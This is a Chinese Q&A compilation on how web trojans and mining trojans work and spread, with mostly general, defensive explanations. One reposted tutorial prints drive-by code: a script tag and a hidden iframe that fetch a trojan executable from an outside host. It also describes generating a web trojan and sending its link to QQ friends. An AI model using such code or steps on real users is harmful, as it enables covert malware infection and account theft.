網站的挖礦木馬原理是什麼

⑴ 挖礦木馬的傳播途徑是什麼

挖礦木馬是依賴漏洞、外掛程序、網頁掛馬、弱口令等途徑進行傳播的，騰訊電腦管家的2017年網路安全報告有說這個問題。

⑵ 網頁木馬生成器的原理是什麼

「灰鴿子」網頁木馬從原理、製作到防範

1.網頁木馬的攻擊原理- 2.為什麼是灰鴿子- 3.網頁木馬的基本用法（1）- 4.網頁木馬的基本用法（2）- 5.網頁木馬的防範策略（1）- 6.網頁木馬的防範策略（2）-
編者按：事物都有兩面性。本文介紹的網頁木馬製作技巧，意在加強大家的防範意識，而不是想「荼毒生靈」。希望能給大家帶來一些幫助，營造一個安全的上網環境。

如果你訪問××網站（國內某門戶網站），你就會中灰鴿子木馬。這是我一黑客朋友給我說的一句說。打開該網站的首頁，經檢查，我確實中了灰鴿子。怎麼實現的呢？他說，他侵入了該網站的伺服器並在網站主頁上掛了網頁木馬；一些安全專家常說，不要打開陌生人發來的網址，為什麼？因為該網址很有可能就是一些不懷好意者精心製作的網頁木馬。

以上只是網頁木馬的兩種形式，實際上網頁木馬還可以掛在多媒體文件（RM、RMVB、WMV、WMA、Flash）、電子郵件、論壇等多種文件和場合上。很可怕吧，那麼用戶如何防範網頁木馬呢？下面我們就先從網頁木馬的攻擊原理說起。

一、網頁木馬的攻擊原理

首先明確，網頁木馬實際上是一個HTML網頁，與其它網頁不同的是該網頁是黑客精心製作的，用戶一旦訪問了該網頁就會中木馬。為什麼說是黑客精心製作的呢？因為嵌入在這個網頁中的腳本恰如其分地利用了IE瀏覽器的漏洞，讓IE在後台自動下載黑客放置在網路上的木馬並運行（安裝）這個木馬，也就是說，這個網頁能下載木馬到本地並運行（安裝）下載到本地電腦上的木馬，整個過程都在後台運行，用戶一旦打開這個網頁，下載過程和運行（安裝）過程就自動開始。

有朋友會說，打開一個網頁，IE瀏覽器真的能自動下載程序和運行程序嗎？如果IE真的能肆無忌憚地任意下載和運行程序，那天下還不大亂。實際上，為了安全，IE瀏覽器是禁止自動下載程序特別是運行程序的，但是，IE瀏覽器存在著一些已知和未知的漏洞，網頁木馬就是利用這些漏洞獲得許可權來下載程序和運行程序的。下面我舉IE瀏覽器早期的一個漏洞來分別說明這兩個問題。

⒈自動下載程序

<SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>

小提示：代碼說明

a. 代碼中「src」的屬性為程序的網路地址，本例中「http://go163go.vicp.net/1.exe」為我放置在自己Web伺服器上的灰鴿子服務端安裝程序，這段代碼能讓網頁下載該程序到瀏覽它的電腦上。

b. 也可以把木馬程序上傳到免費的主頁空間上去，但免費空間出於安全的考慮，多數不允許上傳exe文件，黑客可能變通一下把擴展名exe改為bat或com，這樣他們就可以把這些程序上傳到伺服器上了。

把這段代碼插入到網頁源代碼的</BODY>…</BODY>之間（如圖1），然後用沒打補丁的IE6打開，接下來，打開IE的臨時目錄<Temporary Internet Files>，你會發現，在該文件夾中有一個「1.exe」文件，這也就是說，該網頁已自動下載了我放置在Web伺服器上的灰鴿子木馬。

二、網頁木馬的基本用法

理解了網頁木馬攻擊的原理，我們可以製作自己的網頁木馬，但這需要你根據IE漏洞寫出利用代碼。實際上，在網上有很多高手已寫出了一些漏洞的利用代碼，有的還把它寫成了可視化的程序。在搜索引擎輸入「網頁木馬生成器」進行搜索，你會發現，在網上有很多利用IE的各種漏洞編寫的網頁木馬生成器，它們大都為可視化的程序，只要你有一個木馬（該木馬必須把它放置到網路上），利用這些生成器你就可以立即生成一個網頁，該網頁就是網頁木馬，只要他人打開這個網頁，該網頁就可以自動完成下載木馬並運行（安裝）木馬的過程。

在我的電腦上我已下載了一個網頁木馬生成器，下面我們來看怎麼生成網頁木馬並讓他人中木馬。

第一步：啟動該網頁木馬生成器，如圖4所示，在文本框中輸入木馬的網路地址，最後單擊「生成」。

圖4 網頁木馬生成器

第二步：在網頁木馬生成器的安裝文件夾會生成一個網頁文件，該文件就是我們在上一步生成的網頁木馬。上傳該文件到自己的Web伺服器或免費主面空間。

現在好了，把上述網頁在伺服器上的地址（網址）通過QQ發給自己的好友，一旦他訪問了該網頁，該網頁就會在他的電腦上自動下載並運行你放置在網路上的木馬。

現在你該明白安全專家勸告的「不要打開陌生人發來的網路地址」這句話的真諦了吧！實際上，即使人人都不打開陌生人發來的網址，也仍然有一些人「飛蛾補燈，自尋死路」，因為若大的Internet，總會有一些人會有意或無意地訪問這些網址，而且，有些網頁木馬，還掛在一些知名網站上（根據知名網站的訪問量，你算算吧，每天有多少人中了木馬！）。

小提示：你可能還沒想到，看電影，在論壇查看或回復帖子也能中木馬。實際上，網頁木馬還可以掛在多媒體文件、電子郵件、論壇、CHM電子書上，這樣，用戶一旦觀看電影、查看或預覽郵件（主要是一些用電子郵件群發器發送的垃圾郵件）、參與帖子，打開電子書，用戶就會中網頁木馬。

在下面我們只介紹黑客如何在知名網站上掛網頁木馬。下面來看這一段代碼：iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0"></iframe>

參考資料上很詳細！！！！！
參考資料：http://www.pconline.com.cn/pce/soft/virus/hkgfz/0604/783762_2.html

⑶ 360加速球裡面的挖礦木馬是啥

這個不用耽心，360有自動攔截功能的。
挖礦木馬如今風頭正盛，吸金力更是直追勒索病毒。近日，360安全衛士截獲一款利用「永恆之藍」傳播的門羅幣挖礦木馬，由於搭載了重磅攻擊彈葯，該木馬傳播量龐大，高峰時每天達10萬次，360近期攔截到的攻擊更達超百萬次。

據了解，這是挖礦木馬攜帶「永恆之藍」針對普通網民實施的一次大規模攻擊，為防止電腦成為黑客挖礦苦力，360提醒網民確保打好補丁免疫各類利用「永恆之藍」的攻擊，同時開啟360安全衛士全面防禦各類挖礦木馬
。

⑷ 木馬的原理是什麼

是一種後門程序這個木馬涉及網路還有社會工程學等各個方面，說起來麻煩，最簡單打個比方說，電腦是你的家，而木馬就象是你家後門的鑰匙，黑客是怎麼配得到你家的鑰匙的了？答案是利用人的好奇心，吸引力去在，被掛馬的網頁或者是瀏覽某個不健康的網頁另外軟體本身的漏洞、而你的電腦又沒有及時打好補丁，就相當於窗戶沒關，結果就中馬了。中馬以後你的資料帳號就會被窺視一空，中國最早的木馬就是——冰河，其次是灰鴿子、QQ啊拉大盜等等木馬都是這樣的
，

⑸ 網站木馬原理

網頁木馬就是表面上偽裝成正常網頁或者在網頁中插入代碼，當用戶訪問時，網頁木馬就會利用系統或瀏覽器漏洞將配置好的木馬服務端進行自動下載並執行。
網頁掛馬就是利用漏洞向用戶傳播木馬下載器，通過將一個木馬程序上傳到網站里，然後通過木馬下載器下載網頁木馬，並上傳到空間裡面，修改代碼，從而在用戶訪問網頁時執行。
網頁掛馬常用方式：
1、將網頁木馬偽裝成頁面元素，木馬則會被瀏覽器自動下載到本地。
2、利用腳本運行木馬下載器
3、將木馬偽裝成缺失組件，或和缺失組件進行捆綁(flash播放插件)。
木馬的存在形態有如下幾種：
1、框架掛馬
2、js文件掛馬
3、body掛馬
4、css中掛馬
5、圖片偽裝

⑹ 網頁木馬的工作原理是什麼

他都是在網上復制下來回答~~我最PS這種人~~~ 例如：WWW。.com/520.htm.是個網馬地址.(520.htm就是網馬) 當你訪問這個地址的520.htm的時候~就等於訪問這個地址的空間裡面的520.exe木馬.. 那麼就是說~你訪問了WWW。.com/520.htm.~就等於訪問了520.exe木馬.. 我想~我這樣說~你會明白~~

⑺ 撒旦挖礦木馬是怎麼侵入電腦的

該變種利用永恆之藍漏洞進行網路攻擊，一旦入侵成功，就會上傳中毒電腦信息、更新病毒模塊、下載執行挖礦模塊以及執行網路攻擊模塊進行蠕蟲式擴散。由於該變種具備感染性強、傳播速度快、波及范圍廣等顯著特點，極易在企業內網爆發，需要引起行業用戶及安全業界的高度警惕。可以用騰訊電腦管家進行防禦的

⑻ 挖礦木馬是什麼意思

是一種新型病毒的代名詞 俗塵就是木馬 回答完畢

⑼ 木馬的原理是什麼

木馬是如何侵入的？

一般的木馬都有客戶端和伺服器端兩個執行程序，其中客戶端是用於攻擊者遠程式控制制植入木馬的機器，伺服器端程序即是木馬程序。攻擊者要通過木馬攻擊你的系統，他所做的第一步是要把木馬的伺服器端程序植入到你的電腦裡面。

目前木馬入侵的主要途徑還是先通過一定的方法把木馬執行文件弄到被攻擊者的電腦系統里，如郵件、下載等，然後通過一定的提示故意誤導被攻擊者打開執行文件，比如故意謊稱這是個木馬執行文件是你朋友送給你賀卡，可能你打開這個文件後，確實有賀卡的畫面出現，但這時可能木馬已經悄悄在你的後台運行了。

一般的木馬執行文件非常小，大到都是幾K到幾十K，如果把木馬捆綁到其它正常文件上，你很難發現的，所以，有一些網站提供的軟體下載往往是捆綁了木馬文件的，在你執行這些下載的文件，也同時運行了木馬。

木馬也可以通過Script、ActiveX及Asp、Cgi交互腳本的方式植入，由於微軟的瀏覽器在執行Script腳本上存在一些漏洞，攻擊者可以利用這些漏洞傳皤病毒和木馬，甚至直接對瀏覽者電腦進行文件操作等控制，前不久就出現一個利用微軟Scripts腳本漏洞對瀏覽者硬碟進行格式化的Html頁面。如果攻擊者有辦法把木馬執行文件上載到攻擊主機的一個可執行WWW目錄夾裡面，他可以通過編制Cgi程序在攻擊主機上執行木馬目錄。

木馬還可以利用系統的一些漏洞進行植入，如微軟著名的IIS伺服器溢出漏洞，通過一個IISHACK攻擊程序即在把IIS伺服器崩潰，並且同時在攻擊伺服器執行遠程木馬執行文件。

木馬如何將入侵主機信息發送給攻擊者？

木馬在被植入攻擊主機後，它一般會通過一定的方式把入侵主機的信息，如主機的IP地址、木馬植入的埠等發送給攻擊者，這樣攻擊者有這些信息才能夠與木馬里應外合控制攻擊主機。

在早期的木馬裡面，大多都是通過發送電子郵件的方式把入侵主機信息告訴攻擊者，有一些木馬文件乾脆把主機所有的密碼用郵件的形式通知給攻擊者，這樣攻擊都就不用直接連接攻擊主機即可獲得一些重要數據，如攻擊OICQ密碼的GOP木馬即是如此。

使用電子郵件的方式對攻擊者來說並不是最好的一種選擇，因為如果木馬被發現，可以能過這個電子郵件的地址找出攻擊者。現在還有一些木馬採用的是通過發送UDP或者ICMP數據包的方式通知攻擊者。